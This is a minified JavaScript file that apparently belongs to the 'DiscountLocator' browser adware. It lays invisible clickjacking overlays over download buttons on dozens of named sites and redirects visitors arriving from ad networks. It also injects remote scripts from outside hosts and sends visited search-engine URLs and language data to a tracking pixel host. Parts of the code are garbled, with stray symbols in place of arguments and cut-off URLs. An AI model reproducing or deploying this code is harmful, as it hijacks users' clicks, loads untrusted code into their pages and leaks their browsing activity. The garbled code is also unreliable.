function(){this.init=function(){-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),\na.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1),a.addEventListener(\"mousedown\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"mp3seal.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",\nfunction(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1),a.addEventListener(\"mousedown\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"mp3vampire.com\"]=new function(){this.init=function(){-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1),a.addEventListener(\"mousedown\",\nfunction(e){e.returnValue=!1;e.preventDefault&&e.preventDefault()},!1))}};this[\"minecraftdl.com\"]=new function(){this.init=function(){-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));if(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=\n0;i<document.links.length;i++){var e=document.links[i];\".exe\"==e.href.substr(-4)&&(e=e.parentNode,e.style.position=\"relative\",d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.top=0,d.style.left=0,d.style.width=\"100%\",d.style.height=\"100%\",d.style.cursor=\"pointer\",d.style.zIndex=9999,e.appendChild(d))}}};this[\"leunlckr.co\"]=new function(){this.init=function(){if(-1<document.location.host.indexOf(\"leunlckr.co\")){var e=document.getElementsByTagName(\"button\")[0],h=document.createElement(\"button\");\nh.className=e.className;h.innerHTML=e.innerHTML;e.parentNode.insertBefore(h,e);e.parentNode.removeChild(e)}}};this[\"go.theadsnet.com\"]=new function(){this.init=function(){-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");(function(){var e=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var h=setInterval(function(){try{var k=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*k.children[2].children[1].children[1].innerText);m.push(1*k.children[2].children[2].children[1].innerText);\nm.push(1*k.children[3].children[1].children[1].innerText);m.push(1*k.children[3].children[2].children[1].innerText);for(var n=k=0;n<m.length;n++)k+=m[n];if(!(0<k)){clearInterval(h);var r=document.createElement(\"div\");r.style.position=\"absolute\";r.style.top=0;r.style.left=0;r.style.width=\"100%\";r.style.height=\"100%\";r.style.zIndex=\"9999\";r.style.cursor=\"pointer\";var u=document.getElementById(\"ucd-countdown-1-content\").children[1];u.style.position=\"relative\";u.appendChild®}}catch(q){try{var p=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),\nfunction(){p+=1*jQuery(this).text()});if(0===p){clearInterval(h);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(s){\"undefined\"!==typeof e&&30<++e&&clearInterval(h)}}},750)}catch(k){}})()}};this[\"ziddu.com\"]=new function(){this.init=function(){var e=0,h=setInterval(function(){e++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var k=0;k<document.links.length;k++)try{var l=\ndocument.links[k].href.toLowerCase();if(-1==l.indexOf(\"ww.ziddu.co\")&&-1==l.indexOf(\"#\")&&-1==l.indexOf(\"tunes.apple.co\")&&-1==l.indexOf(\"lay.google.co\")&&-1==l.indexOf(\"/gallery/\")){try{for(var m=document.links[k],n=0;15>=n;n++)m=m.parentNode;if(-1<m.className.indexOf(\"footerbg\"))continue}catch®{}var p=document.links[k].parentNode;if(!(-1<p.className.indexOf(\"addthis_toolbox\"))){p.style.position=\"relative\";var q=document.createElement(\"div\");q.style.position=\"absolute\";q.style.left=0;q.style.top=\n0;q.style.width=\"100%\";q.style.height=\"100%\";q.style.zIndex=\"9999\";q.style.cursor=\"pointer\";p.appendChild(q)}}}catch(w){}l=document.getElementsByTagName(\"iframe\");for(k=0;k<l.length;k++)try{-1==l[k].src.indexOf(\"acebook.co\")&&-1==l[k].src.indexOf(\"cp.crwdcntrl.ne\")&&(p=l[k].parentNode,p.style.position=\"relative\",q=document.createElement(\"div\"),q.style.position=\"absolute\",q.style.left=0,q.style.top=0,q.style.width=\"100%\",q.style.height=\"100%\",q.style.zIndex=\"9999\",q.style.cursor=\"pointer\",q.id=k,p.appendChild(q))}catch(t){}}20<\ne&&clearInterval(h)},500)}};this[\"pensubtitles.us\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var e=document.getElementById(\"divPlayerDesc\");if(null!=e){e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.zIndex=\"2000\";e.appendChild(h);if(e=e.children[0]){var k=e.children[0];k&&k.setAttribute(\"href\",\"javascript:void(0);\")}}e=\ndocument.getElementById(\"divPlayerHead\");if(null!=e)for(var l=0;l<e.children.length;l++)if(\"span\"==e.children[l].tagName.toLowerCase()){var m=e.children[l],h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"106%\";h.style.height=\"70px\";h.style.cursor=\"pointer\";h.style.top=\"-50px\";h.style.left=\"-6%\";h.style.zIndex=\"2000\";(k=m.children[0])&&k.setAttribute(\"href\",\"javascript:void(0);\");m.style.position=\"relative\";m.appendChild(h)}}}};this[\"opensubtitles.org\"]=new function(){this.init=\nfunction(){new function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var e=document.getElementById(\"divPlayerDesc\");if(null!=e){e.style.position=\"relative\";var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.zIndex=\"2000\";e.appendChild(h)}e=document.getElementById(\"divPlayerHead\");if(null!=e)for(var k=0;k<e.children.length;k++)if(\"span\"==e.children[k].tagName.toLowerCase()){var l=\ne.children[k],h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"70px\";h.style.cursor=\"pointer\";h.style.top=\"-50px\";h.style.zIndex=\"2000\";l.style.position=\"relative\";l.appendChild(h)}}}}};this[\"romptfile.co\"]=new function(){this.init=function(){if(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var e={},h=document.getElementsByTagName(\"iframe\"),k=0;k<h.length;k++)\"300\"==h[k].getAttribute(\"width\")&&\"250\"==h[k].getAttribute(\"height\")&&(e=h[k].parentNode);\ne.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";e.appendChild(d)}}};this[\"pensoftwareupdater.co\"]=new function(){this.init=function(){new function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var e=$(\".download\").parent();e.css(\"position\",\"relative\");\nvar h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"100%\";h.style.width=\"122px\";h.style.right=\"0\";h.style.top=\"0\";h.style.cursor=\"pointer\";e.append(h);e=$(\"#addBoxX\").parent();e.css(\"position\",\"relative\");h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.zIndex=\"2000\";h.style.height=\"45px\";h.style.width=\"101px\";h.style.right=\"22px\";h.style.bottom=\"16px\";h.style.cursor=\"pointer\";e.append(h);window.__qqcount++;10<window.__qqcount&&\nclearInterval(window.__qqint)},250);else for(var e=document.links,h={},k={},l=0;l<e.length;l++)h=e[l].getAttribute(\"href\"),null!=h&&-1<h.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(h=e[l].getAttribute(\"id\"),null!=h&&\"addBoxX\"==h?(k=e[l].parentNode,k.style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.zIndex=\"2000\",h.style.height=\"45px\",h.style.width=\"101px\",h.style.right=\"22px\",h.style.bottom=\"16px\"):(k=e[l].parentNode,k.style.position=\n\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.zIndex=\"2000\",h.style.height=\"100%\",h.style.width=\"122px\",h.style.right=\"0\",h.style.top=\"0\"),h.style.cursor=\"pointer\",k.appendChild(h))}}};this[\"veehd.com\"]=new function(){this.init=function(){new function(){if(-1<window.location.href.indexOf(\"veehd.com/video/\")){var e=document.getElementsByTagName(\"iframe\")[0],h={};null!=e&&(e=e.parentNode,h=document.createElement(\"div\"),h.style.top=\"0\",h.style.width=\"100%\",h.style.height=\n\"100%\",h.style.cursor=\"pointer\",h.style.zIndex=\"2000\",h.style.position=\"absolute\",e.style.position=\"relative\",e.appendChild(h));e=document.getElementById(\"preview\");null!=e&&(h=document.createElement(\"div\"),h.style.top=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.cursor=\"pointer\",h.style.zIndex=\"2000\",h.style.position=\"absolute\",e.style.position=\"relative\",e.appendChild(h))}else for(var h=document.getElementsByTagName(\"a\"),k=0;k<h.length;k++)if(\"getDownload();\"==h[k].getAttribute(\"onclick\")){e=\ndocument.createElement(\"a\");e.style.cursor=\"pointer\";var l=document.createElement(\"img\");l.setAttribute(\"src\",h[k].children[0].getAttribute(\"src\"));l.setAttribute(\"border\",\"0\");e.appendChild(l);l=h[k].parentNode;l.removeChild(h[k]);h=l.getElementsByTagName(\"div\")[0];l.insertBefore(e,h);break}}}};this[\"ullypcgames.ne\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var e=document.getElementsByTagName(\"center\"),h=0;h<e.length;h++){var k=e[h].firstChild;\n\"undefined\"!==typeof k.tagName&&\"a\"==k.tagName.toLowerCase()&&(e[h].style.position=\"relative\",k=document.createElement(\"div\"),k.style.position=\"absolute\",k.style.top=\"0\",k.style.left=\"0\",k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"2000\",k.style.cursor=\"pointer\",e[h].appendChild(k))}}};this[\"llplayer.com.b\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var e=document.getElementsByTagName(\"img\"),h=0;h<e.length;h++)if(e[h].getAttribute(\"src\")&&\n-1<e[h].getAttribute(\"src\").indexOf(\"fullpage_eng.png\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\"pointer\";var l=e[h].parentNode.parentNode;l.style.position=\"relative\";l.appendChild(k)}}};this[\"ubtitulosespanol.or\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var e=document.links;for(i=0;i<e.length;i++)if(\"Descargue su subt\\u00edtulo aqu\\u00ed\"===\n(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);k.style.position=\"relative\"}}}};this[\"ubtitles4free.ne\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var e=document.links;for(i=0;i<e.length;i++)if(\"Download Subtitle\"===(e[i].innerText?\ne[i].innerText:e[i].textContent)||\"Download Player\"===(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);k.style.position=\"relative\"}}}};this[\"legendasbrasil.org\"]=new function(){this.init=function(){if(0<location.host.toLowerCase().indexOf(\"legendasbrasil.org\")){var e=document.links;\nfor(i=0;i<e.length;i++)if(\"Baixar Legenda\"===(e[i].innerText?e[i].innerText:e[i].textContent)||\"Baixar Player\"===(e[i].innerText?e[i].innerText:e[i].textContent)||\"Baixe sua legenda aqui\"===(e[i].innerText?e[i].innerText:e[i].textContent)){var h=document.createElement(\"div\");h.style.position=\"absolute\";h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.top=\"0\";h.style.left=\"0\";h.style.zIndex=\"2000\";var k=e[i].parentNode;k.appendChild(h);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=\nnew function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var e=document.getElementsByTagName(\"a\"),h=0;h<e.length;h++){var k=\"undefined\"===typeof e[h].innerText?e[h].textContent:e[h].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");l.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";\nl.style.top=\"0\";l.style.cursor=\"pointer\";var m=e[h].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var e=document.getElementsByTagName(\"iframe\"),h=0;h<e.length;h++){var k=e[h].parentNode;if(null!=\nk){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&\nclearInterval(window.__z_tream2int);var e=document.getElementById(\"rh_toolbar_STRTOPB\"),h=document.getElementById(\"rhfrm_STRTOPB\");if(null!=e&&null!=h){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";e.appendChild(k);h.style.position=\"absolute\";h.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))}};this[\"old_ki_ckass.to\"]=new function(){var e=this;e.init=function(){location.protocol+\n\"//\"+window.location.host+\"/\"!=window.location.href&&(e.counter=0,e.kickass=function(){20<++e.counter&&clearInterval(e.interval);var h=p.utils.query_selector_all(\".advertDownload\");if(0<h.length){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.cursor=\"pointer\";k.style.zIndex=\"2000\";k.style.position=\"absolute\";k.style.top=\"0\";k.style.left=\"0\";h[0].appendChild(k);h[0].style.position=\"relative\";h[0].style.overflow=\"hidden\";h=h[0].getElementsByTagName(\"a\");for(k=\n0;k<h.length;k++)h[k].setAttribute(\"href\",\"javascript:void(0);\"),h[k].setAttribute(\"onclick\",\"void(0);\");clearInterval(e.interval)}},e.interval=setInterval(e.kickass,500))}};this[\"kickass.to\"]=new function(){var e=this;e.init=function(){if(location.protocol+\"//\"+window.location.host+\"/\"!=window.location.href){e.counter=0;e.___ZskskskCount=0;e.___ZskskskthisZ=function(){try{20<++e.___ZskskskCount&&clearInterval(e.___ZskskskInter);for(var h=document.getElementsByTagName(\"div\"),k=0;k<h.length;k++){var l=\nh[k].getAttribute(\"align\");if(l&&\"center\"==l){var m=h[k].children[0];if(m&&m.getAttribute&&\"siteButton giantButton\"==m.getAttribute(\"class\")){var n=document.createElement(\"a\");n.style.fontSize=\"20px\";n.style.textAlign=\"center\";n.style.marginBottom=\"5px\";n.className=\"siteButton giantButton\";var p=document.createElement(\"span\");p.innerText?p.innerText=\"Protect yourself now with hide.me VPN\":p.textContent=\"Protect yourself now with hide.me VPN\";n.appendChild(p);h[k].removeChild(m);h[k].appendChild(n);\nclearInterval(e.___ZskskskInter)}}}}catch(s){clearInterval(e.___ZskskskInter)}};e.___ZskskskInter=setInterval(e.___ZskskskthisZ,500);for(var h=p.utils.query_selector_all(\".partner1Button.idownload.icon16\"),k=0;k<h.length;k++){var l=h[k].nextSibling,m=document.createElement(\"a\");m.className=\"partner1Button idownload icon16\";m.setAttribute(\"href\",\"#\");var n=document.createElement(\"span\");m.appendChild(n);n=h[k].parentNode;l?n.insertBefore(m,l):n.appendChild(m);n.removeChild(h[k])}e.counter=0;e.kickassx=\nfunction(){20<++e.counter&&clearInterval(e.interval);0<p.utils.query_selector_all(\"div#vuzeDownload a\").length&&(document.getElementById(\"vuzeDownload\").parentNode.innerHTML='<div id=\"vuzeDownload\">To download this torrent, you need a BitTorrent client: <a href=\"#\">Bitlord</a></div>',clearInterval(e.interval))};e.interval=setInterval(e.kickassx,500);e.counterClick=0;e.kickassClick=function(){20<++e.counterClick&&clearInterval(e.interval2);var h=p.utils.query_selector_all(\".block.botmarg5px\")[0];h&&\n\"Download faster CLICK HERE\"==(h.innerText?h.innerText:h.textContent)&&(h.innerHTML='<div class=\"block botmarg5px\">Download faster <a href=\"#\">CLICK HERE</a></div>',clearInterval(e.interval2))};e.interval2=setInterval(e.kickassClick,500)}}};this[\"uploadrocket.net\"]=new function(){this.init=function(){var e=p.utils.query_selector_all(\".dlbutton_green\");if(e&&0<e.length){var e=e[0],h=document.createElement(\"a\");h.className=\"dlbutton_green\";h.setAttribute(\"href\",\"javascript:void(0)\");var k=document.createElement(\"span\");\nk.innerText?k.innerText=\"Download Now\":k.textContent=\"Download Now\";h.appendChild(k);k=e.parentNode;k.removeChild(e);k.appendChild(h)}(e=p.utils.query_selector_all(\".middle\"))&&0<e.length&&(e=e[0].children[4])&&e.setAttribute(\"href\",\"javascript:void(0);\");if((e=p.utils.query_selector_all(\"#ID_freeorpremium table tr td a\"))&&0<e.length)for(h=0;h<e.length;h++)e[h].setAttribute(\"href\",\"javascript:void(0);\");(e=p.utils.query_selector_all(\"#ID_freeorpremium input[type='submit']\"))&&0<e.length&&e[0].setAttribute(\"type\",\n\"button\");(e=p.utils.query_selector_all(\"#ID_freeorpremium\"))&&0<e.length&&(e=e[0])&&(e.style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.width=\"100%\",h.style.height=\"95px\",h.style.zIndex=\"2000\",h.style.top=\"0\",h.style.cursor=\"pointer\",e.appendChild(h))}};this.injectHidden=function(){var e=document.createElement(\"input\");e.type=\"hidden\";e.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(e)};if(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==\ntypeof this[location.host]&&this.activeZds[location.host]&&window.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var s in this.activeZds)if(-1<location.host.indexOf(s)&&1==this.activeZds[s])try{this[s].init(),this.injectHidden()}catch(x){}};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\" http://superiends.or...window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=DiscountLocator&systemid=7436871928167141055&ext=DiscountLocator\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=72_1&hid=7436871928167141055&bname=DiscountLocator\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=72_1&hid=7436871928167141055&bname=DiscountLocator\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=511181&ext=DiscountLocator&systemid=7436871928167141055&ext=DiscountLocator\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"DiscountLocator\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c, b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=7436871928167141055&eid=72&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.c...=function(){var 